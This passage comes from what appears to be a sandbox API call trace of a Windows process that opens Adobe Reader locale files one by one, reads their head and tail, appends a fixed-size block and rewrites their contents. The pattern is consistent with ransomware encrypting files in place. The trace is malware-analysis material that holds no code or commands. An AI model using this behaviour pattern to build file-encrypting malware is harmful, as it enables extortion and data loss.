hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x0 [0083.170] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0083.171] ReleaseMutex (hMutex=0x168) returned 1 [0083.171] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="makeaccessible.KOR", cchWideChar=18, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 18 [0083.171] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="makeaccessible.KOR", cchWideChar=18, lpMultiByteStr=0x1f88a64, cbMultiByte=18, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="makeaccessible.KOR", lpUsedDefaultChar=0x0) returned 18 [0083.171] ReadFile (in: hFile=0x1f0, lpBuffer=0x1ea5e88, nNumberOfBytesToRead=0x4000, lpNumberOfBytesRead=0x331f278, lpOverlapped=0x0 | out: lpBuffer=0x1ea5e88*, lpNumberOfBytesRead=0x331f278*=0x4000, lpOverlapped=0x0) returned 1 [0083.173] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x331f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x331f2e8*=0) returned 0xac00 [0083.173] ReadFile (in: hFile=0x1f0, lpBuffer=0x2867a58, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x331f278, lpOverlapped=0x0 | out: lpBuffer=0x2867a58*, lpNumberOfBytesRead=0x331f278*=0x1000, lpOverlapped=0x0) returned 1 [0083.174] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x331f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x331f2e8*=0) returned 0xac00 [0083.174] WriteFile (in: hFile=0x1f0, lpBuffer=0x1e93878*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x331f28c, lpOverlapped=0x0 | out: lpBuffer=0x1e93878*, lpNumberOfBytesWritten=0x331f28c*=0x1588, lpOverlapped=0x0) returned 1 [0083.175] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x331f2bc*=0) returned 0x0 [0083.175] WriteFile (in: hFile=0x1f0, lpBuffer=0x1ea5e88*, nNumberOfBytesToWrite=0x4000, lpNumberOfBytesWritten=0x331f28c, lpOverlapped=0x0 | out: lpBuffer=0x1ea5e88*, lpNumberOfBytesWritten=0x331f28c*=0x4000, lpOverlapped=0x0) returned 1 [0083.176] CloseHandle (hObject=0x1f0) returned 1 [0083.176] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\ko_KR\\Search.KOR" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\ko_kr\\search.kor"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1f0 [0083.177] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x0 [0083.177] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x4200 [0083.177] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x0 [0083.177] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0083.177] ReleaseMutex (hMutex=0x168) returned 1 [0083.177] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Search.KOR", cchWideChar=10, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0083.178] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Search.KOR", cchWideChar=10, lpMultiByteStr=0x1f7366c, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Search.KOR", lpUsedDefaultChar=0x0) returned 10 [0083.178] ReadFile (in: hFile=0x1f0, lpBuffer=0x1ebf2d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x331f278, lpOverlapped=0x0 | out: lpBuffer=0x1ebf2d8*, lpNumberOfBytesRead=0x331f278*=0x1000, lpOverlapped=0x0) returned 1 [0083.179] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x331f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x331f2e8*=0) returned 0x3200 [0083.180] ReadFile (in: hFile=0x1f0, lpBuffer=0x1ebf2d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x331f278, lpOverlapped=0x0 | out: lpBuffer=0x1ebf2d8*, lpNumberOfBytesRead=0x331f278*=0x1000, lpOverlapped=0x0) returned 1 [0083.180] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x331f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x331f2e8*=0) returned 0x3200 [0083.180] WriteFile (in: hFile=0x1f0, lpBuffer=0x1e93878*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x331f28c, lpOverlapped=0x0 | out: lpBuffer=0x1e93878*, lpNumberOfBytesWritten=0x331f28c*=0x1588, lpOverlapped=0x0) returned 1 [0083.181] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x331f2bc*=0) returned 0x0 [0083.181] WriteFile (in: hFile=0x1f0, lpBuffer=0x1ebf2d8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x331f28c, lpOverlapped=0x0 | out: lpBuffer=0x1ebf2d8*, lpNumberOfBytesWritten=0x331f28c*=0x1000, lpOverlapped=0x0) returned 1 [0083.181] CloseHandle (hObject=0x1f0) returned 1 [0083.181] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\nb_NO\\Acroform.NOR" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\nb_no\\acroform.nor"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1f0 [0083.182] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x0 [0083.182] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x61e00 [0083.182] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x0 [0083.183] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0083.183] ReleaseMutex (hMutex=0x168) returned 1 [0083.183] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Acroform.NOR", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0083.183] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Acroform.NOR", cchWideChar=12, lpMultiByteStr=0x1f7362c, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Acroform.NOR", lpUsedDefaultChar=0x0) returned 12 [0083.183] ReadFile (in: hFile=0x1f0, lpBuffer=0x25a0018, nNumberOfBytesToRead=0x8000, lpNumberOfBytesRead=0x331f278, lpOverlapped=0x0 | out: lpBuffer=0x25a0018*, lpNumberOfBytesRead=0x331f278*=0x8000, lpOverlapped=0x0) returned 1 [0083.186] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x331f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x331f2e8*=0) returned 0x60e00 [0083.186] ReadFile (in: hFile=0x1f0, lpBuffer=0x1ebf2d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x331f278, lpOverlapped=0x0 | out: lpBuffer=0x1ebf2d8*, lpNumberOfBytesRead=0x331f278*=0x1000, lpOverlapped=0x0) returned 1 [0083.190] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x331f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x331f2e8*=0) returned 0x60e00 [0083.190] WriteFile (in: hFile=0x1f0, lpBuffer=0x1e93878*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x331f28c, lpOverlapped=0x0 | out: lpBuffer=0x1e93878*, lpNumberOfBytesWritten=0x331f28c*=0x1588, lpOverlapped=0x0) returned 1 [0083.191] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x331f2bc*=0) returned 0x0 [0083.191] WriteFile (in: hFile=0x1f0, lpBuffer=0x2882db8*, nNumberOfBytesToWrite=0x8000, lpNumberOfBytesWritten=0x331f28c, lpOverlapped=0x0 | out: lpBuffer=0x2882db8*, lpNumberOfBytesWritten=0x331f28c*=0x8000, lpOverlapped=0x0) returned 1 [0083.191] CloseHandle (hObject=0x1f0) returned 1 [0083.192] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\nb_NO\\EScript.NOR" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\nb_no\\escript.nor"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1f0 [0083.193] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x0 [0083.193] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x9c00 [0083.193] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x0 [0083.193] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0083.193] ReleaseMutex (hMutex=0x168) returned 1 [0083.193] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="EScript.NOR", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0083.194] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="EScript.NOR", cchWideChar=11, lpMultiByteStr=0x1f7342c, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="EScript.NOR", lpUsedDefaultChar=0x0) returned 11 [0083.194] ReadFile (in: hFile=0x1f0, lpBuffer=0x2863a28, nNumberOfBytesToRead=0x4000, lpNumberOfBytesRead=0x331f278, lpOverlapped=0x0 | out: lpBuffer=0x2863a28*, lpNumberOfBytesRead=0x331f278*=0x4000, lpOverlapped=0x0) returned 1 [0083.197] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x331f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x331f2e8*=0) returned 0x8c00 [0083.197] ReadFile (in: hFile=0x1f0, lpBuffer=0x1ebf2d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x331f278, lpOverlapped=0x0 | out: lpBuffer=0x1ebf2d8*, lpNumberOfBytesRead=0x331f278*=0x1000, lpOverlapped=0x0) returned 1 [0083.201] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x331f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x331f2e8*=0) returned 0x8c00 [0083.201] WriteFile (in: hFile=0x1f0, lpBuffer=0x1e93878*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x331f28c, lpOverlapped=0x0 | out: lpBuffer=0x1e93878*, lpNumberOfBytesWritten=0x331f28c*=0x1588, lpOverlapped=0x0) returned 1 [0083.202] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x331f2bc*=0) returned 0x0 [0083.202] WriteFile (in: hFile=0x1f0, lpBuffer=0x2863a28*, nNumberOfBytesToWrite=0x4000, lpNumberOfBytesWritten=0x331f28c, lpOverlapped=0x0 | out: lpBuffer=0x2863a28*, lpNumberOfBytesWritten=0x331f28c*=0x4000, lpOverlapped=0x0) returned 1 [0083.202] CloseHandle (hObject=0x1f0) returned 1 [0083.202] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\nb_NO\\reflow.NOR" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\nb_no\\reflow.nor"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1f0 [0083.203] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x0 [0083.203] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x1200 [0083.203] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x0 [0083.203] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0083.204] ReleaseMutex (hMutex=0x168) returned 1 [0083.204] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="reflow.NOR", cchWideChar=10, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0083.204] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="reflow.NOR", cchWideChar=10, lpMultiByteStr=0x1f7362c, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="reflow.NOR", lpUsedDefaultChar=0x0) returned 10 [0083.204] ReadFile (in: hFile=0x1f0, lpBuffer=0x1e93878, nNumberOfBytesToRead=0x1200, lpNumberOfBytesRead=0x331f2bc, lpOverlapped=0x0 | out: lpBuffer=0x1e93878*, lpNumberOfBytesRead=0x331f2bc*=0x1200, lpOverlapped=0x0) returned 1 [0083.718] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x331f300*=0) returned 0x0 [0083.718] WriteFile (in: hFile=0x1f0, lpBuffer=0x1e93878*, nNumberOfBytesToWrite=0x1788, lpNumberOfBytesWritten=0x331f2d0, lpOverlapped=0x0 | out: lpBuffer=0x1e93878*, lpNumberOfBytesWritten=0x331f2d0*=0x1788, lpOverlapped=0x0) returned 1 [0083.718] CloseHandle (hObject=0x1f0) returned 1 [0083.719] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\nb_NO\\Weblink.NOR" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\nb_no\\weblink.nor"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1f0 [0083.719] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x0 [0083.720] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x6c00 [0083.720] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x0 [0083.720] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0083.720] ReleaseMutex (hMutex=0x168) returned 1 [0083.721] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Weblink.NOR", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0083.721] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Weblink.NOR", cchWideChar=11, lpMultiByteStr=0x1f733cc, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Weblink.NOR", lpUsedDefaultChar=0x0) returned 11 [0083.726] ReadFile (in: hFile=0x1f0, lpBuffer=0x1e90018, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x331f278, lpOverlapped=0x0 | out: lpBuffer=0x1e90018*, lpNumberOfBytesRead=0x331f278*=0x1000, lpOverlapped=0x0) returned 1 [0083.744] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x331f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x331f2e8*=0) returned 0x5c00 [0083.747] ReadFile (in: hFile=0x1f0, lpBuffer=0x1ebf2d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x331f278, lpOverlapped=0x0 | out: lpBuffer=0x1ebf2d8*, lpNumberOfBytesRead=0x331f278*=0x1000, lpOverlapped=0x0) returned 1 [0083.754] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x331f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x331f2e8*=0) returned 0x5c00 [0083.754] WriteFile (in: hFile=0x1f0, lpBuffer=0x1e93878*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x331f28c, lpOverlapped=0x0 | out: lpBuffer=0x1e93878*, lpNumberOfBytesWritten=0x331f28c*=0x1588, lpOverlapped=0x0) returned 1 [0083.755] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x331f2bc*=0) returned 0x0 [0083.755] WriteFile (in: hFile=0x1f0, lpBuffer=0x1ebf2d8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x331f28c, lpOverlapped=0x0 | out: lpBuffer=0x1ebf2d8*, lpNumberOfBytesWritten=0x331f28c*=0x1000, lpOverlapped=0x0) returned 1 [0083.755] CloseHandle (hObject=0x1f0) returned 1 [0083.756] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\nl_NL\\DVA.NLD" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\nl_nl\\dva.nld"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1f0 [0083.757] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x0 [0083.757] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x4c00 [0083.757] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x0 [0083.758] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0083.758] ReleaseMutex (hMutex=0x168) returned 1 [0083.758] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DVA.NLD", cchWideChar=7, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 7 [0083.758] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DVA.NLD", cchWideChar=7, lpMultiByteStr=0x1f7ac0c, cbMultiByte=7, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="DVA.NLD", lpUsedDefaultChar=0x0) returned 7 [0083.758] ReadFile (in: hFile=0x1f0, lpBuffer=0x1ebf2d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x331f278, lpOverlapped=0x0 | out: lpBuffer=0x1ebf2d8*, lpNumberOfBytesRead=0x331f278*=0x1000, lpOverlapped=0x0) returned 1 [0083.759] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x331f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x331f2e8*=0) returned 0x3c00 [0083.760] ReadFile (in: hFile=0x1f0, lpBuffer=0x1ebf2d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x331f278, lpOverlapped=0x0 | out: lpBuffer=0x1ebf2d8*, lpNumberOfBytesRead=0x331f278*=0x1000, lpOverlapped=0x0) returned 1 [0083.760] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x331f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x331f2e8*=0) returned 0x3c00 [0083.761] WriteFile (in: hFile=0x1f0, lpBuffer=0x1e93878*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x331f28c, lpOverlapped=0x0 | out: lpBuffer=0x1e93878*, lpNumberOfBytesWritten=0x331f28c*=0x1588, lpOverlapped=0x0) returned 1 [0083.761] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x331f2bc*=0) returned 0x0 [0083.761] WriteFile (in: hFile=0x1f0, lpBuffer=0x1ebf2d8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x331f28c, lpOverlapped=0x0 | out: lpBuffer=0x1ebf2d8*, lpNumberOfBytesWritten=0x331f28c*=0x1000, lpOverlapped=0x0) returned 1 [0083.762] CloseHandle (hObject=0x1f0) returned 1 [0083.762] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\nl_NL\\RdLang32.NLD" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\nl_nl\\rdlang32.nld"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1f0 [0083.763] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x0 [0083.763] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x155c00 [0083.763] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x0 [0083.763] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0083.763] ReleaseMutex (hMutex=0x168) returned 1 [0083.763] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="RdLang32.NLD", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0083.763] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="RdLang32.NLD", cchWideChar=12, lpMultiByteStr=0x1f7366c, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="RdLang32.NLD", lpUsedDefaultChar=0x0) returned 12 [0083.764] ReadFile (in: hFile=0x1f0, lpBuffer=0x2882db8, nNumberOfBytesToRead=0xf000, lpNumberOfBytesRead=0x331f278, lpOverlapped=0x0 | out: lpBuffer=0x2882db8*, lpNumberOfBytesRead=0x331f278*=0xf000, lpOverlapped=0x0) returned 1 [0083.767] ReadFile (in: hFile=0x1f0, lpBuffer=0x2882db8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x331f278, lpOverlapped=0x0 | out: lpBuffer=0x2882db8*, lpNumberOfBytesRead=0x331f278*=0x1000, lpOverlapped=0x0) returned 1 [0083.768] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x331f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x331f2e8*=0) returned 0x154c00 [0083.768] ReadFile (in: hFile=0x1f0, lpBuffer=0x1ebf2d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x331f278, lpOverlapped=0x0 | out: lpBuffer=0x1ebf2d8*, lpNumberOfBytesRead=0x331f278*=0x1000, lpOverlapped=0x0) returned 1 [0083.772] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x331f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x331f2e8*=0) returned 0x154c00 [0083.773] WriteFile (in: hFile=0x1f0, lpBuffer=0x1e93878*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x331f28c, lpOverlapped=0x0 | out: lpBuffer=0x1e93878*, lpNumberOfBytesWritten=0x331f28c*=0x1588, lpOverlapped=0x0) returned 1 [0083.774] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x331f2bc*=0) returned 0x0 [0083.774] WriteFile (in: hFile=0x1f0, lpBuffer=0x2882db8*, nNumberOfBytesToWrite=0xf000, lpNumberOfBytesWritten=0x331f28c, lpOverlapped=0x0 | out: lpBuffer=0x2882db8*, lpNumberOfBytesWritten=0x331f28c*=0xf000, lpOverlapped=0x0) returned 1 [0083.774] WriteFile (in: hFile=0x1f0, lpBuffer=0x2882db8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x331f28c, lpOverlapped=0x0 | out: lpBuffer=0x2882db8*, lpNumberOfBytesWritten=0x331f28c*=0x1000, lpOverlapped=0x0) returned 1 [0083.774] CloseHandle (hObject=0x1f0) returned 1 [0083.775] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\nl_NL\\Spelling.NLD" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\nl_nl\\spelling.nld"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1f0 [0083.776] 